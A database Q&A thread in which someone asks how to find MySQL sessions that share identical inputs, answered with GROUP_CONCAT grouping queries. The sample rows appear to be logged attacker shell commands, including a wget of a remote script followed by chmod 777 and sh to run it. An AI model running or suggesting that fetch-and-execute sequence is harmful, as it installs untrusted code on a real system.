MySQL – How to Select Same Data for Unique Item

MySQLselect

I have this SQL table:

+-----------+-------------+------+-----+---------+----------------+
| Field     | Type        | Null | Key | Default | Extra          |
+-----------+-------------+------+-----+---------+----------------+
| id        | int(11)     | NO   | PRI | NULL    | auto_increment |
| session   | char(32)    | NO   | MUL | NULL    |                |
| timestamp | datetime    | NO   |     | NULL    |                |
| realm     | varchar(50) | YES  |     | NULL    |                |
| success   | tinyint(1)  | YES  |     | NULL    |                |
| input     | text        | NO   |     | NULL    |                |
+-----------+-------------+------+-----+---------+----------------+

CREATE TABLE output:

| input | CREATE TABLE `input` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `session` char(32) NOT NULL,
  `timestamp` datetime NOT NULL,
  `realm` varchar(50) DEFAULT NULL,
  `success` tinyint(1) DEFAULT NULL,
  `input` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `session` (`session`,`timestamp`,`realm`)
) ENGINE=InnoDB AUTO_INCREMENT=263867 DEFAULT CHARSET=latin1 |

One unique session can has a lot of inputs, for example:

+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| id     | session                          | timestamp           | realm | success | input                   |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| 238483 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:20 | NULL  |       1 | cd /tmp || cd /var/run  |
| 238484 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:20 | NULL  |       1 | cd /etc                 |                                           
| 238488 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:20 | NULL  |       1 | wget http://web.www/0.sh|
| 238489 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:25 | NULL  |       1 | chmod 777 aaa.sh        |
| 238490 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:25 | NULL  |       1 | sh aaa.sh               |
| 238491 | fb13c01d6eac414ca890d4cda3309e96 | 2016-05-08 07:17:25 | NULL  |       1 | wget                    |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+

Other next unique session has a lot of inputs too for example:

+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| id     | session                          | timestamp           | realm | success | input                   |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| 238493 | 68ea19620a8711e4955f0800271247b3 | 2016-06-09 08:17:20 | NULL  |       1 | cd /opt                 |
| 238494 | 68ea19620a8711e4955f0800271247b3 | 2016-05-09 08:17:22 | NULL  |       1 | pwd                     |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+

And next unique session can has the same inputs as other unique session, for example:

+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| id     | session                          | timestamp           | realm | success | input                   |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+
| 238511 | a570f5cc0a9111e4955f0800271247b3 | 2016-06-10 07:19:20 | NULL  |       1 | cd /opt                 |
| 238512 | a570f5cc0a9111e4955f0800271247b3 | 2016-05-10 07:20:20 | NULL  |       1 | pwd                     |
+--------+----------------------------------+---------------------+-------+---------+-------------------------+

Now I need select all sessions which have the same inputs. So in this example it will be two sessions: 68ea19620a8711e4955f0800271247b3 and a570f5cc0a9111e4955f0800271247b3. What way can I get correct results for all records in the table please?

EDIT

Hello,

I am a friend of the OP, so I attempt to clarify the question a bit. Let's say we have a table that lists privileges granted to individual users. The table has two columns: UserId (integer) and PrivilegeName (varchar). Let's say the table has the following content:

UserId    PrivilegeName
-----------------------
1          read
2          read
3          write
2          execute
1          execute
3          read
3          execute

As you can see, users 1 and 2 have read and execute privileges, whereas the user 3 has read, write and execute ones. Users 1 and 2 have exactly the same privileges.

And finally the question: how to list users that have EXACTLY THE SAME privileges? For the sample case, the response is {1, 2}. In practice, more sets can be returned if more groups of users having exactly the same privileges (e.g. users 1 and 2 have read and execute, and users 3 and 4 have write privilege) exist.

This is basically the problem. Well, the OP actually needs to list user sets that not only have exactly the same privileges but the privileges were granted to them in the same order (e.g. there may be a column containing a date when a privilege was granted).

Best Answer

Plan A: First get 1 row per user:

SELECT user_id,
       GROUP_CONCAT(priv ORDER BY priv) AS privileges
    FROM tbl
    GROUP BY user_id

Then look for dups

SELECT GROUP_CONCAT(user_id) AS users,
       privileges
    FROM ( the select above ) x
    GROUP BY privileges
    HAVING COUNT(*) > 1;

Plan B: This involves changing the data structure. By using the datatyps SET instead of multiple rows, you can have

CREATE TABLE foo(
    user_id ...,
    privs ENUM('read', 'write', ...) NOT NULL
)

Then do

SELECT GROUP_CONCAT(user_id) AS users
       privs
    FROM foo
    GROUP BY privs
    HAVING COUNT(*) > 1;

If this fails to map to something in the original question, maybe I have given you some things to think about. Or maybe "normalization" of the original table(s) would help make it look more like my example.

Notes: GROUP_CONCAT has, by default, a limit of 1024 characters; this can be increased. There may be a limit on how long a string can be for use in GROUP BY privileges.